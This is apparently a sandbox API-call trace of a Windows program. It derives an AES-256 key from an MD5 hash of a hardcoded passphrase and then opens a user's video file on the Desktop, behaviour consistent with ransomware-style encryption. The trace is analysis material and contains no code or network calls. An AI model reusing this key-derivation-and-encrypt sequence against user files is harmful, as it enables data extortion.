0x43cf900 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0128.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0128.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabe0 [0128.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0128.875] PeekMessageW (in: lpMsg=0x144e7dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e7dc) returned 0 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0128.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0128.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0128.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0128.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0128.875] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.875] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0128.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0128.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0128.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0128.876] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.876] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.877] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.877] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0128.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0128.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0128.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0128.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.878] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContext") returned 0x0 [0128.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0128.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0128.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0128.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0128.878] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0128.879] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.879] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0128.879] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.880] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0128.881] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0128.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0128.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf10 | out: hHeap=0x1780000) returned 1 [0128.882] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0128.882] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0128.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.882] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0128.882] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.882] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caf58, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0128.883] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0128.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0128.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2788, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0128.921] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0128.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0128.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2728, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0128.921] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.921] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0128.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43cafe8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0128.921] CryptHashData (hHash=0x41ac180, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0128.921] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.921] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0128.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cadf0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0128.922] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac180, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac700) returned 1 [0128.922] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.922] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0128.922] CryptDestroyHash (hHash=0x41ac180) returned 1 [0128.922] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\-ibxuw5BT.mp4" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\-ibxuw5bt.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0128.923] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0128.923] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0128.923] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0128.923] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392110 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4fa8 [0128.924] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0128.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0128.925] 